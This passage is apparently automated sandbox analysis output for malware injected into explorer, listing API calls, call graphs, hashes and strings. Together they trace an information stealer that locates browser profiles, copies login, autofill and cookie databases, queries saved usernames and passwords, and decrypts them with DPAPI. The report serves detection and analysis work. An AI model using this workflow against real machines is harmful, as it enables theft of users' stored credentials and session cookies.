315->316 318 2753339 315->318 321 2753345-275334b 316->321 322 2753351-275336a call 2751798 * 3 316->322 318->316 330 275326d-2753273 319->330 331 2753279-275328e call 2751fa7 319->331 324 27532c1-27532c8 call 2751011 320->324 321->322 325 275334d 321->325 322->294 324->294 325->322 330->331 334 2753275 330->334 339 2753290-2753296 331->339 340 275329c-27532bb call 2751798 * 3 331->340 334->331 339->340 341 2753298 339->341 340->324 341->340
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02751B6A: CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02752893,00000000,00000000,00000000,?), ref: 02751B82
                                                                                                                                          • Part of subcall function 02751B6A: CloseHandle.KERNEL32(00000000), ref: 02751B8F
                                                                                                                                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 027530F9
                                                                                                                                        • GetTempFileNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02753103
                                                                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 0275310A
                                                                                                                                        • CopyFileW.KERNEL32(?,00000000,00000000), ref: 02753115
                                                                                                                                        • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 027531A4
                                                                                                                                        • RtlZeroMemory.NTDLL(?,00000040), ref: 027531D7
                                                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 027532DF
                                                                                                                                        • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 0275339C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                                                        • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                                                                                                                                        • API String ID: 2757140130-4052020286
                                                                                                                                        • Opcode ID: 080ca261b1708006b4be5b85fbcf3e5b0f5075f870b28a2b6b9f06a00962bf4f
                                                                                                                                        • Instruction ID: afee89150d402cc43c5579136e75e8bca7e2841f1354463275897cbd6e7858a6
                                                                                                                                        • Opcode Fuzzy Hash: 080ca261b1708006b4be5b85fbcf3e5b0f5075f870b28a2b6b9f06a00962bf4f
                                                                                                                                        • Instruction Fuzzy Hash: 5A91AE71508351ABD711DF24C844F2FFBEAAFC5799F44492CF889962A0DBB5D804CB62
                                                                                                                                        Function 02753ED9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 82stringfileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
                                                                                                                                          • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
                                                                                                                                        • PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 02753F0A
                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?,00000000), ref: 02753F16
                                                                                                                                        • lstrcmpiW.KERNEL32(?,027A62CC), ref: 02753F38
                                                                                                                                        • lstrcmpiW.KERNEL32(?,027A62D0), ref: 02753F4C
                                                                                                                                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 02753F69
                                                                                                                                        • lstrcmpiW.KERNEL32(?,Local State), ref: 02753F7E
                                                                                                                                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 02753F9B
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 02753FB5
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 02753FC4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                                                                                                                                        • String ID: *.*$Local State
                                                                                                                                        • API String ID: 3923353463-3324723383
                                                                                                                                        • Opcode ID: f8422cb1066c3ba408670ae3e47d00ec6f0f1c94fa0f41eed739c026918003d9
                                                                                                                                        • Instruction ID: 78c2961f85f7a30c77106a3e8c020ca31cb03a42af05d742ad0be1034b68042a
                                                                                                                                        • Opcode Fuzzy Hash: f8422cb1066c3ba408670ae3e47d00ec6f0f1c94fa0f41eed739c026918003d9
                                                                                                                                        • Instruction Fuzzy Hash: F921C1316402246BEB11A630DC0CE2BBBADDFC27A6B484929BC16C21D0EBB484598A61
                                                                                                                                        Function 02752B15 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 102filestringCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02751953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02752F0C), ref: 02751973
                                                                                                                                          • Part of subcall function 02751953: lstrlenW.KERNEL32(027A6564,?,?,02752F0C), ref: 02751978
                                                                                                                                          • Part of subcall function 02751953: lstrcatW.KERNEL32(00000000,?,?,?,02752F0C), ref: 02751990
                                                                                                                                          • Part of subcall function 02751953: lstrcatW.KERNEL32(00000000,027A6564,?,?,02752F0C), ref: 02751994
                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 02752B3D
                                                                                                                                        • lstrcmpiW.KERNEL32(?,027A62CC), ref: 02752B63
                                                                                                                                        • lstrcmpiW.KERNEL32(?,027A62D0), ref: 02752B7B
                                                                                                                                          • Part of subcall function 027519B4: lstrlenW.KERNEL32(00000000,00000000,00000000,02752CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 027519C4
                                                                                                                                        • StrStrIW.SHLWAPI(00000000,logins.json), ref: 02752BE7
                                                                                                                                        • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 02752C16
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 02752C43
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 02752C52
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                                                                                                                                        • String ID: \*.*$cookies.sqlite$logins.json
                                                                                                                                        • API String ID: 1108783765-3717368146
                                                                                                                                        • Opcode ID: be09314ac81a54f6077f8216aae7d778670d4e532b533d4c4ffb66e6bb21966c
                                                                                                                                        • Instruction ID: 29c6d7afb15d10190f610193618ade29a69d2a622e71594f7b914f31cf220ab7
                                                                                                                                        • Opcode Fuzzy Hash: be09314ac81a54f6077f8216aae7d778670d4e532b533d4c4ffb66e6bb21966c
                                                                                                                                        • Instruction Fuzzy Hash: 6731B6307043654B9F15AB309C58A3FF79EAFC4711B48492CAD4AD2282EBB9C9069A51
                                                                                                                                        Function 02751D4A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 109stringfileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 531 2751d4a-2751d5c 532 2751eb4-2751ebe 531->532 533 2751d62-2751d66 531->533 533->532 534 2751d6c-2751d77 call 27519b4 533->534 537 2751d79-2751d89 call 2751953 534->537 538 2751d8b-2751d97 call 2751953 534->538 543 2751d9b-2751d9d 537->543 538->543 543->532 544 2751da3-2751db4 FindFirstFileW 543->544 545 2751ead-2751eaf call 2751011 544->545 546 2751dba 544->546 545->532 548 2751dbe-2751dc3 546->548 549 2751dc5-2751dd7 lstrcmpiW 548->549 550 2751e3d-2751e6a call 2751953 call 275199d lstrcmpiW 548->550 552 2751ddd-2751def lstrcmpiW 549->552 553 2751e8e-2751e9c FindNextFileW 549->553 561 2751e87-2751e89 call 2751011 550->561 562 2751e6c-2751e75 call 2751cf7 550->562 552->553 556 2751df5-2751e00 call 27519b4 552->556 553->548 554 2751ea2-2751ea9 FindClose 553->554 554->545 563 2751e02-2751e07 556->563 564 2751e09 556->564 561->553 562->561 570 2751e77-2751e7f 562->570 566 2751e0b-2751e3b call 2751953 call 275199d call 2751d4a 563->566 564->566 566->561 570->561
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 027519B4: lstrlenW.KERNEL32(00000000,00000000,00000000,02752CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 027519C4
                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?,00000000), ref: 02751DA9
                                                                                                                                        • lstrcmpiW.KERNEL32(?,027A62CC), ref: 02751DCF
                                                                                                                                        • lstrcmpiW.KERNEL32(?,027A62D0), ref: 02751DE7
                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 02751E62
                                                                                                                                          • Part of subcall function 02751CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,02752C27), ref: 02751D02
                                                                                                                                          • Part of subcall function 02751CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 02751D0D
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 02751E94
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 02751EA3
                                                                                                                                          • Part of subcall function 02751953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02752F0C), ref: 02751973
                                                                                                                                          • Part of subcall function 02751953: lstrlenW.KERNEL32(027A6564,?,?,02752F0C), ref: 02751978
                                                                                                                                          • Part of subcall function 02751953: lstrcatW.KERNEL32(00000000,?,?,?,02752F0C), ref: 02751990
                                                                                                                                          • Part of subcall function 02751953: lstrcatW.KERNEL32(00000000,027A6564,?,?,02752F0C), ref: 02751994
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                                                                                                                                        • String ID: *.*$\*.*
                                                                                                                                        • API String ID: 232625764-1692270452
                                                                                                                                        • Opcode ID: 1f8e75a7e0d04635a4552e78ef261ca206badf35bd2f9344fec50d25e8161dfc
                                                                                                                                        • Instruction ID: dcc575b86cb22a93929c0030e34f9ac5b0f5a808776a7492694ed199b229deff
                                                                                                                                        • Opcode Fuzzy Hash: 1f8e75a7e0d04635a4552e78ef261ca206badf35bd2f9344fec50d25e8161dfc
                                                                                                                                        • Instruction Fuzzy Hash: F631A6307043615BDB11EB308898B7FF7EE9FC4353F444A29ED4E92240EBF588458A52
                                                                                                                                        Function 02753E04 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 75encryptionCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 641 2753e04-2753e11 call 2751b6a 644 2753ed4-2753ed8 641->644 645 2753e17-2753e22 call 2751c31 641->645 645->644 648 2753e28-2753e34 call 2752fb1 645->648 651 2753ec8-2753ecc 648->651 652 2753e3a-2753e4f call 275123b 648->652 651->644 655 2753e51-2753e58 652->655 656 2753ec0-2753ec7 call 2751011 652->656 658 2753ebf 655->658 659 2753e5a-2753e6a 655->659 656->651 658->656 661 2753e6c-2753e7c RtlCompareMemory 659->661 662 2753eb8-2753eba call 2751011 659->662 661->662 663 2753e7e-2753ea6 CryptUnprotectData 661->663 662->658 663->662 665 2753ea8-2753ead 663->665 665->662 666 2753eaf-2753eb3 665->666 666->662
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02751B6A: CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02752893,00000000,00000000,00000000,?), ref: 02751B82
                                                                                                                                          • Part of subcall function 02751B6A: CloseHandle.KERNEL32(00000000), ref: 02751B8F
                                                                                                                                          • Part of subcall function 02751C31: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,02753E1E,00000000,?,02753FA8), ref: 02751C46
                                                                                                                                          • Part of subcall function 02751C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,02753FA8), ref: 02751C56
                                                                                                                                          • Part of subcall function 02751C31: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,02753FA8), ref: 02751C76
                                                                                                                                          • Part of subcall function 02751C31: CloseHandle.KERNEL32(00000000,?,02753FA8), ref: 02751C91
                                                                                                                                          • Part of subcall function 02752FB1: StrStrIA.SHLWAPI(00000000,"encrypted_key":",00000000,00000000,00000000,02753E30,00000000,00000000,?,02753FA8), ref: 02752FC1
                                                                                                                                          • Part of subcall function 02752FB1: lstrlen.KERNEL32("encrypted_key":",?,02753FA8), ref: 02752FCE
                                                                                                                                          • Part of subcall function 02752FB1: StrStrIA.SHLWAPI("encrypted_key":",027A692C,?,02753FA8), ref: 02752FDD
                                                                                                                                          • Part of subcall function 0275123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,02753E4B,00000000), ref: 0275124A
                                                                                                                                          • Part of subcall function 0275123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02751268
                                                                                                                                          • Part of subcall function 0275123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02751295
                                                                                                                                        • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 02753E74
                                                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02753E9E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
                                                                                                                                        • String ID: $DPAP$DPAP$IDPAP
                                                                                                                                        • API String ID: 3076719866-957854035
                                                                                                                                        • Opcode ID: 643df28d065a2fdabc9d894588f02bfdc3057c687e44f8f2d24fb40103b65585
                                                                                                                                        • Instruction ID: 45bec016adf037668c845d5b31801e31f6ffacd0288bd6cef657d847eefd116a
                                                                                                                                        • Opcode Fuzzy Hash: 643df28d065a2fdabc9d894588f02bfdc3057c687e44f8f2d24fb40103b65585
                                                                                                                                        • Instruction Fuzzy Hash: 5021F3726043655BD712EA688C90A7FF2DDAF84740F840A6DEC48D7240EBF4CD088BD2
                                                                                                                                        Function 02754B92 Relevance: 3.0, APIs: 2, Instructions: 26nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02751162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0275116F
                                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02754BB6
                                                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF), ref: 02754BBF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1675517319-0
                                                                                                                                        • Opcode ID: a7432630ee063868ada6eba58da06871d4f221a1211bad0c571ca83be92d0de4
                                                                                                                                        • Instruction ID: a76af23f17f165e381718528495a01f162738b2c407ff24140ed873b91b9a7e5
                                                                                                                                        • Opcode Fuzzy Hash: a7432630ee063868ada6eba58da06871d4f221a1211bad0c571ca83be92d0de4
                                                                                                                                        • Instruction Fuzzy Hash: 98E0D8359016306BCF597F30BC2CF4BBB5E9FC1371F10C914A959920C0CBB14480CA50
                                                                                                                                        Function 02756512 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetSystemInfo.KERNEL32(027B20A4,00000001,00000000,0000000A,027A3127,027528DA,00000000,?), ref: 0275BFFC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 31276548-0
                                                                                                                                        • Opcode ID: 30725753146968534689755362786fe908103ca65a984deb58e3d3cc109bb444
                                                                                                                                        • Instruction ID: 40f93b1dfceceb243625fb59e311f5bd4af2345d467f3c6f48edb4c690067173
                                                                                                                                        • Opcode Fuzzy Hash: 30725753146968534689755362786fe908103ca65a984deb58e3d3cc109bb444
                                                                                                                                        • Instruction Fuzzy Hash: 47E092717C433030F61336B86C1BF9A9A4E4F81F00FE04915FF1AA80CCCBD994404A26
                                                                                                                                        Function 02753C40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 147stringfileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02751B6A: CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02752893,00000000,00000000,00000000,?), ref: 02751B82
                                                                                                                                          • Part of subcall function 02751B6A: CloseHandle.KERNEL32(00000000), ref: 02751B8F
                                                                                                                                          • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
                                                                                                                                          • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
                                                                                                                                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 02753C6A
                                                                                                                                        • GetTempFileNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02753C76
                                                                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 02753C7D
                                                                                                                                        • CopyFileW.KERNEL32(?,00000000,00000000), ref: 02753C89
                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 02753D2F
                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 02753D36
                                                                                                                                        • wsprintfA.USER32 ref: 02753D55
                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 02753D61
                                                                                                                                        • lstrcat.KERNEL32(00000000,?), ref: 02753D89
                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 02753DB2
                                                                                                                                        • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 02753DED
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
                                                                                                                                        • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                                                                                                                                        • API String ID: 2923052733-3488123210
                                                                                                                                        • Opcode ID: 9ce002a9e8abd319a00dddc938ddba9a7ebe82fc7378c12f5052e68654dca593
                                                                                                                                        • Instruction ID: 6ccc5daadeb4d377f4b6e5d926790ba1cc8d752c224e32aa6510134f2d55c558
                                                                                                                                        • Opcode Fuzzy Hash: 9ce002a9e8abd319a00dddc938ddba9a7ebe82fc7378c12f5052e68654dca593
                                                                                                                                        • Instruction Fuzzy Hash: E341B231604321ABD712AB75CC88E3FBBAEAFC5795F44496CFC4AA2151DB75C8018B62
                                                                                                                                        Function 027528F8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 158stringfileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 348 27528f8-27528fa 349 2752900-275291c call 2751000 call 27702ec 348->349 350 2752ac8-2752ada call 27a3848 DeleteFileW call 2751011 348->350 359 2752922-275293a call 2751fa7 349->359 360 2752a8f-2752aa2 call 276fb92 lstrlen 349->360 357 2752adf-2752ae6 350->357 367 275293c-2752942 359->367 368 2752948-275295f call 2751fa7 359->368 365 2752aa4-2752abc call 2751798 * 3 360->365 366 2752ac1-2752ac3 call 2751011 360->366 365->366 366->350 367->368 370 2752944 367->370 376 2752961-2752967 368->376 377 275296d-2752984 call 2751fa7 368->377 370->368 376->377 378 2752969 376->378 383 2752986-275298c 377->383 384 2752992-27529a7 call 2751fa7 377->384 378->377 383->384 385 275298e 383->385 388 27529b5-27529cc call 2751fa7 384->388 389 27529a9-27529af 384->389 385->384 393 27529ce-27529d4 388->393 394 27529da-27529e5 lstrlen 388->394 389->388 390 27529b1 389->390 390->388 393->394 397 27529d6 393->397 395 2752a79-2752a85 call 27702ec 394->395 396 27529eb-27529f0 lstrlen 394->396 395->359 402 2752a8b 395->402 396->395 398 27529f6-2752a11 call 2751000 396->398 397->394 404 2752a13 398->404 405 2752a1b-2752a56 call 2752112 wsprintfA lstrlen 398->405 402->360 404->405 408 2752a58-2752a68 call 275102f 405->408 409 2752a6a-2752a74 lstrcat call 2751011 405->409 408->409 409->395
                                                                                                                                        APIs
                                                                                                                                        • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 02752AD2
                                                                                                                                          • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
                                                                                                                                          • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 027529E1
                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 027529EC
                                                                                                                                        • wsprintfA.USER32 ref: 02752A38
                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 02752A44
                                                                                                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 02752A6C
                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?), ref: 02752A99
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
                                                                                                                                        • String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
                                                                                                                                        • API String ID: 304071051-2605711689
                                                                                                                                        • Opcode ID: cc9a511a59ed76a60c4402e10913f1ff5b6642b264de3f9213f570a69d243f8b
                                                                                                                                        • Instruction ID: a4ba354b24cae671f05fca9275f407e16f08bb0d74391a943d8edb20a5b07744
                                                                                                                                        • Opcode Fuzzy Hash: cc9a511a59ed76a60c4402e10913f1ff5b6642b264de3f9213f570a69d243f8b
                                                                                                                                        • Instruction Fuzzy Hash: B351A1306043564BDB26EF309854B3FB7DAAFC5705F44482DFC89A7252DB75D8058B52
                                                                                                                                        Function 02752CB5 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 112stringCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 484 2752cb5-2752cc7 call 2751953 488 2752e17-2752e2d call 2752ae9 484->488 489 2752ccd-2752d06 call 2751953 call 2751000 * 2 call 2751b6a 484->489 500 2752d0c-2752d1c GetPrivateProfileSectionNamesW 489->500 501 2752df9-2752e12 call 2751011 * 4 489->501 500->501 502 2752d22-2752d26 500->502 501->488 504 2752df5 502->504 505 2752d2c-2752d32 502->505 504->501 507 2752d36-2752d39 505->507 509 2752ded-2752df1 507->509 510 2752d3f-2752d4d StrStrIW 507->510 509->504 512 2752dd7-2752de7 lstrlenW 510->512 513 2752d53-2752d70 GetPrivateProfileStringW 510->513 512->507 512->509 513->512 515 2752d72-2752d88 GetPrivateProfileIntW 513->515 517 2752dcc-2752dd2 call 2752ae9 515->517 518 2752d8a-2752d9c call 2751953 515->518 517->512 523 2752db4-2752dca call 2752ae9 call 2751011 518->523 524 2752d9e-2752da2 518->524 523->512 525 2752da4-2752daa 524->525 526 2752dac-2752db2 524->526 525->526 526->523 526->524
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02751953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02752F0C), ref: 02751973
                                                                                                                                          • Part of subcall function 02751953: lstrlenW.KERNEL32(027A6564,?,?,02752F0C), ref: 02751978
                                                                                                                                          • Part of subcall function 02751953: lstrcatW.KERNEL32(00000000,?,?,?,02752F0C), ref: 02751990
                                                                                                                                          • Part of subcall function 02751953: lstrcatW.KERNEL32(00000000,027A6564,?,?,02752F0C), ref: 02751994
                                                                                                                                          • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
                                                                                                                                          • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
                                                                                                                                          • Part of subcall function 02751B6A: CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02752893,00000000,00000000,00000000,?), ref: 02751B82
                                                                                                                                          • Part of subcall function 02751B6A: CloseHandle.KERNEL32(00000000), ref: 02751B8F
                                                                                                                                        • GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 02752D13
                                                                                                                                        • StrStrIW.SHLWAPI(00000000,Profile), ref: 02752D45
                                                                                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,Path,027A637C,?,00000FFF,?), ref: 02752D68
                                                                                                                                        • GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 02752D7B
                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 02752DD8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
                                                                                                                                        • String ID: IsRelative$Path$Profile$profiles.ini
                                                                                                                                        • API String ID: 2234428054-4107377610
                                                                                                                                        • Opcode ID: 22de6d4eb863e5c9146fe75a4ae211fe3b6cec6a97259710ec6dcade1479ac82
                                                                                                                                        • Instruction ID: aadf32fba26ea5bf9e544db5dfc01b3276b51e4df7f504425f3587a99c229d58
                                                                                                                                        • Opcode Fuzzy Hash: 22de6d4eb863e5c9146fe75a4ae211fe3b6cec6a97259710ec6dcade1479ac82
                                                                                                                                        • Instruction Fuzzy Hash: 0A31C2307443215BDA15AF31985473FF7A7AFC4711F44442EED0AA7282EBF588428B92
                                                                                                                                        Function 02751333 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 226COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
